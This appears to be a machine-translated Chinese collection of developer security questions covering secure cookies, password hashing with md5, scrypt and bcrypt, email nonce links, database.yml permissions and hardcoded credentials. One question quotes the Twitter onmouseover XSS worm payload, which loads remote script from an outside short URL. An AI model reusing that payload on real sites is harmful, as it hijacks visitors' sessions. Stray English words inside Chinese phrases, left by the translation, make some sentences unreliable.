Tag: 安全

保护cookie和https / http混合使用

很多站点似乎都支持https,但不使用安全cookie。 我想使我的网站使用安全的cookie,但允许使用http来访问一些内容。 一个明智的方法来做到这一点似乎是为真正的会议有一个安全的cookie和一个非安全的cookie,这只是一个标志,说如果用户login或不(在头上显示不同的东西,如注销链接而不是login链接)。 这个cookie不包含任何“真实的”会话信息,只是为了使网站可以显示与login用户相比稍微不同的页面,而不是login到网站的http部分。 有整个网站作为https是另一种select,但这似乎比普通的http相当慢,所以不是很理想。 为什么网站不使用这种设置并拥有安全的Cookie? 盗窃cookie的可能性似乎使得安全的cookie成为现在的必需品。 有没有更好的方法来实现相同的事情?

twitter.com上今天的XSS onmouseover漏洞利用

你能解释一下今天在Twitter上发生了什么? 基本上这个漏洞使人们发布一条包含这个链接的推文: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/ 这在技术上是XSS攻击还是其他? 以下是Twitter主页的样子: http : //www.flickr.com/photos/travelist/6832853140/

RSA私钥密码短语如何工作?

RSA私钥可能会被分配一个“密码”,据我所知,这个密码旨在提供一些辅助安全性,以防有人用私钥文件取消密钥。 密码安全层是如何实现的?

SQL Server在Windows应用程序中返回错误“用户login失败NT AUTHORITY \ ANONYMOUS LOGON”

最近开始一直没有问题的应用程序(在大约6个月左右没有进行任何积极的开发)开始无法连接到数据库。 操作pipe理员不能说什么可能会导致问题的变化。 客户端应用程序使用集成安全性= True的硬编码连接string,但是当应用程序试图创build到数据库的连接时,它会抛出一个SQLException,指出“用户login失败”NT AUTHORITY \ ANONYMOUS LOGON。 我可以通过此帐户上的Management Studiologin到数据库没有问题。 我在这个问题上看到的所有东西都是针对ASP.NET项目的,显然这是一个“双跳问题”,作为一个客户端应用程序,最好不要成为问题。 任何帮助将不胜感激。 编辑 客户机和服务器机器以及用户帐户在同一个域中。 这是在Windows防火墙closures时发生的。 主要理论是:服务器在大约一周前重启,未能注册服务主体名称(Service Principal Name,SPN)。 未能注册SPN可能会导致集成身份validation返回到NTLM而不是Kerberos。

在nonce电子邮件中激活/注册/密码重置链接的最佳做法是什么?

应用程序发送电子邮件来validation用户帐户或重置密码。 我相信以下是应该的方式,我要求引用和实现。 如果一个应用程序必须发送一封邮件中的链接来validation用户的地址,根据我的观点,链接和应用程序对链接的处理应该具有以下特征: 该链接在请求URI( http://host/path?nonce )中包含一个随机 http://host/path?nonce 。 在跟随链接(GET)之后,用户被呈现一个表格,可选地具有随机数。 用户确认input(POST)。 服务器收到请求并 检查input参数, 执行更改, 并使nonce失效。 这在安全和幂等方法的HTTP RFC上应该是正确的。 问题是,这个过程涉及到一个额外的页面或用户行为(项目3),这被认为是多余的(如果不是无用的)很多人。 我在向同行和客户展示这种方法时遇到了问题,因此我要求从更广泛的技术小组获得有关这方面的意见。 我反对跳过POST步骤的唯一参数是可能从浏览器预加载的链接。 有没有关于这个问题的参考文献可以更好地解释这个想法,甚至说服一个非技术人员(来自期刊,博客等的最佳实践)呢? 是否有参考网站(最好是stream行的,并与许多用户)实施这种方法? 如果没有,是否有文件logging的理由或等同的替代方法 谢谢, Kariem 细节保留 我把主要部分缩短了,但是为了减less我有意忽略的细节的讨论,我将增加一些假设: 电子邮件的内容不是这个讨论的一部分。 用户知道她必须点击链接才能执行操作。 如果用户没有反应,什么都不会发生,这也是已知的。 我们不必指出我们为什么要邮寄用户,也不必说明沟通政策。 我们假设用户期望收到电子邮件。 该随机数具有到期时间戳,并直接与收件人电子邮件地址关联以减less重复。 笔记 通过使用OpenID等,正常的Web应用程序可以免去执行标准的用户帐户pipe理(密码,电子邮件…),但仍有一些客户希望“ 自己的用户 ” 奇怪的是,我还没有find一个令人满意的问题,也没有回答。 到目前为止我发现的是: 唐在HTTP POST与URL查询参数 – 好主意或不? 托马斯的问题 – 什么时候使用POST,什么时候使用GET?

scrypt优于bcrypt的优势是什么?

我正在研究如何安全地存储密码。 有些人声称,scrypt比bcrypt“更好”,到目前为止,我没有看到任何人反过来说,或者scrypt是不安全的,尽pipe有些人称之为“更有信誉”。 scrypt优于bcrypt的优势是什么? 根据scrypt网站的说法,“对scrypt进行硬件暴力攻击的成本大约是类似bcrypt攻击的成本的4000倍”。 如果这是唯一的优势,那么我不能只使用更多轮数的bcrypt?

什么是md5()的?

我正在阅读本教程的一个简单的PHPlogin系统 。 最后,build议您使用md5()encryption密码 。 虽然我知道这是一个初学者的教程,你不应该把银行账单放在这个login系统后面,这让我想到了encryption。 所以我继续前进(本网站对新手最有用的问题之一): 开发者在build立公共网站之前应该知道什么? 那里说(安全)你应该: encryption哈希和盐密码,而不是将其存储为纯文本。 它没有多说这个,没有提及。 所以我自己去尝试一下: $pass = "Trufa"; $enc = md5($pass); echo $enc; #will echo 06cb51ce0a9893ec1d2dce07ba5ba710 这就是让我思考的问题,虽然我知道md5()可能不是最强的encryption方式,但是总是产生相同结果的任何东西都可以被反向devise。 那么用md5()或其他方法encryption某些东西有什么意义呢? 如果黑客获得用md5()encryption的密码, 他只会使用这个页面! 。 所以现在的实际问题是: 密码encryption如何工作? 我知道我没有在这里发现一个巨大的网页漏洞! :)我只是想了解密码encryption背后的逻辑。 我敢肯定,我正在理解一些错误的东西,并希望能够帮助我设定我和其他人(我希望)。 你将如何应用密码encryption,这实际上是有用的? 这个主意呢? 正如我所说,我可能将整个想法弄错了,但是,这种方法是否会增加安全性以保护真实环境? $reenc = array( "h38an", "n28nu", "fw08d" ); $pass = "Trufa"; $enc = chunk_split(md5($pass),5,$reenc[mt_rand(0,count($reenc)-1)]); echo $enc; 正如你所看到的,我随机添加了任意string( $reenc = array() )给我的md5()密码“使其唯一”。 […]

你如何保护database.yml?

在Ruby on Rails应用程序中,database.yml是存储数据库凭证的纯文本文件。 当我部署Rails应用程序时,我在Capistrano配方中有一个部署后callback,它在应用程序的/ config目录内创build一个到database.yml文件的符号链接。 文件本身存储在标准Capistrano / releases目录结构之外的单独目录中。 我chmod 400文件,所以它只能由创build它的用户可读。 这足以locking它吗? 如果不是的话,你还做什么? 有人正在encryption他们的database.yml文件?

http和https之间的区别

HTTP和HTTPS头有什么区别? 通过HTTP使用HTTPS有什么好处? 为制作网站HTTPS需要做什么设置? 我们可以使用HTTPS仅用于login目的,然后使用HTTP? HTTPS中是否存在任何威胁? HTTPS所需的处理时间是否大于HTTP? HTTPS比HTTP花费更多吗?

在源代码中处理用于身份validation的密码

假设我试图从使用基本authentication/基本证书的RESTful api中取出,那么在我的程序中存储该用户名和密码的最佳方法是什么? 现在它只是坐在那里明文。 UsernamePasswordCredentials creds = new UsernamePasswordCredentials("myName@myserver","myPassword1234"); 有没有办法做到这一点更安全的思想? 谢谢